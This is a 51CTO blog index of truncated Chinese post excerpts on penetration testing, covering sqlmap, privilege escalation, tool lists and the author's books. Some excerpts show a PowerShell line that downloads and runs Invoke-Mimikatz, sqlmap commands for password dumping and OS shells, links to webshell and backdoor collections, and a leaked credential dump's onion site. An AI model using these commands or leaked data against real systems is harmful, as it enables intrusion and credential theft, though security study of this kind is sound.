手机随时阅读
新人专享大礼包¥24
动手学深度学习在线课程https://courses.d2l.ai/zh-v2/
就是写给未来10年的自己。
原来旧的版本非常好用,使用新版本后,发现无法执行。
在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的poc,通过编译后,实施提权。searchsploit提供漏洞本地和在线查询,是渗透测试中提权的重要武器。 1.1searchsploit简介 Exploit Database(https://github.com/offensive-security/exploit-database)这是Offensive Secur
1.黑客画像分析https://github.com/huifeidexingyuner/Hacker_analyse2.基于公开信息收集的威胁开源平台https://github.com/NewBee119/Ti_CollectorTi_Collector为ThreatIntelligenceCollector,主要关注网上公开的信誉类威胁情报和事件类威胁情报。信誉类威胁情报主要来源于一些安全社
漏洞扫描
原来只是想写一个专栏,后面发觉sqlmap真的非常牛逼,于是将相关知识整理成一本书,系统全面的介绍了sqlmap的使用,技巧和渗透利用技巧等。对于高手可以略过,对于想学安全的同学来说,有一定的借鉴,书中很多案例都是来自真实环境,有喜欢的朋友可以到京东进行购买,购买地址:https://item.jd.com/12671154.html
陈小兵,原海军某部网络安全研究员、公安部网络安全攻防实验员、曾就职于北京公安局网络安全总队,北理工计算机学院在读博士;主要从事网络安全攻防研究工作,在网络安全研究与培训、病毒防范、网络渗透等领域具有20年以上经验,在业内享有盛名。2018年受DEFONGROUP010(https://www.anquanke.com/post/id/101477)邀请在上海黑客沙龙做《内网渗透思路》主题分享(视频
对某网站的一次渗 透
侦察主动情报收集EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitnessAWSBucketDump:AWSS3安全扫描工具,允许你快速枚举AWSS3buckets以查找有趣或机密的文件。https://github.com/jordanpotti/AWSBucketDumpAQ
密码哈希值在Oracle 12c数据库中调整Simeon原文链接:https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/Oracle在Oracle Database 12c中对用户密码哈希进行了改进。通过使用基于PBKDF2的SHA512哈希算法,替代过去
时间很快,不知不觉3个月就过去了,明天是去阿里上班的三个月时间,三个月中个人有很多变化,下面是自己的一些感想:一、忙碌充实的生活 相对于公务员那种悠闲的生活,到企业中完全不一样,这里只有自我驱动,不管过程,只为结果买单。努力工作是基本的,仅仅努力还不够,还需要创新,需要多问自己一些问题,5W:when,who,why,w
在penetest过程中碰到一些情况,仅仅获取了webshell权限,无法提权(阿里云服务器),而数据库服务器又不在本地,数据库服务器在阿里云上,仅仅授权webshell所在IP的计算机访问,这时候就需要通过架设代理,通过代理连接数据库服务器,并通过Navicat for SQL Server将数据库从远端取回,同时需要在本地进行还原。
专栏订阅量出奇的好,目前在51cto所有付费专栏中排名第一!作为一个长期在战斗网络安全一线的老兵,一直在坚持技术的研究和学习,做任何事情只有在别人没有做之前完成积累,你才有优势。学习改变生活,学习改变命运,只要坚持不懈,方法得当,一定会获得成功,从2018年初到现在我将工
AWS ArsenalDiscovery:Generate a report of all S3 buckets for an account: https://github.com/bear/s3scanFind open S3 buckets: https://github.com/sa7mon/S3ScannerGenerate Network Diagrams:&nbs
https://soroush.secproject.com/blog/ https://appseceurope2018a.sched.com/speaker/soroush_dalili.1y2dtv3m waf-bypass-techniques-using-http-standard-and-web-servers-behavior
国外14亿泄露数据下载及还原simeon 2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》(链接地址:http://www.freebuf.com/news/174410.html),声称其泄露的数据可以通过暗网网站(http://dumpedlqezarfife.onion.lu/)进行查询,后
php代码审计可以参考:https://github.com/tennc/1000php
https://github.com/tennc/webshell 各种webshell集合https://github.com/ysrc/webshell-samplewebshell样本https://github.com/xl7dev/WebShellWebshell && Backdoor Collectionhttps://github.com/td
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadStr
soap注入某sql2008服务器结合msf进行提权simeon 在实际成功×××过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次×××利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行
sqlmap注入及ms16-075提权总结(1)sqlmap执行命令sqlmap.py -r 1**.***.***.***.txtsqlmap.py -r 1**.***.***.***.txt --is-dbsqlmap.py -r 1**.***.***.***.txt --password --batchsqlmap.py -r 1**.***.***.***.txt --os-shell
很多安全术语将成为历史,没有hacker,没有。。。。。。这促使我们好好学习英语,用英语来写文章,来交流。以后文章中的敏感字用英语了。mark 一下。
使用sqlmap对某php网站进行注入实战 一般来讲一旦网站存在sql注入漏洞,通过sql注入漏洞轻者可以获取数据,严重的将获取webshell以及服务器权限,但在实际漏洞利用和测试过程中,也可能因为服务器配置等情况导致无法获取权限。1.1php注入点的发现及扫描1.使用漏洞扫描工具进行漏洞扫描 将目标url地址放在wvs中进行漏洞扫描,
最早的时候,仅仅是想在sqlmap上面多做一些研究,后面研究越来越深入,做了sqlmap攻防实战专栏,再后来觉得专栏内容会做到30+篇文章,昨天晚上构思了一下,觉得可以整理成一本书,算是今年的研究成果,任何事情,不努力永远没有机会,努力了,就有可能成功。《网络攻防实战-sqlmap从入门到精通》目录第1章sqlmap安装及搭建测试平台1.1在windows上安装sqlmap1.2在centos上安
1.1WAR文件信息泄露及利用1.1.1war简介WAR文件常见于Java应用中,WAR文件和JAR文件的文件格式是一样的,并且都是使用jar命令来创建,但就其应用来说,WAR文件和JAR文件是有根本区别的。JAR文件的目的是把类和相关的资源封装到压缩的归档文件中,而对于WAR文件来说,一个WAR文件代表了一个Web应用程序,它可以包含 Servlet、HTML页面、Java类、图像文件,以及组成
《渗透攻击入门到实战》专栏文章http://blog.51cto.com/cloumn/detail/3从推出到目前基本预订目标17章内容完成更新。回顾整个过程有以下一些感受:1.技术的东西必须深入,目前安全圈安全生态不是特别好,很多内容都是copy,笔者在对某些内容进行查看时,根据文章提供的内容根本无法重现,还需要从头再来,这就很浪费时间。在实际渗透或者ctf比赛中时间就是金钱,有时候多几分钟时
http://www.vulnweb.com/ 上面有针对asp、php、aspx等的sql注入漏洞等测试感兴趣的朋友,可以用这个来实际练习一下。
Copyright © 2005-2022 51CTO.COM 版权所有 京ICP证060544号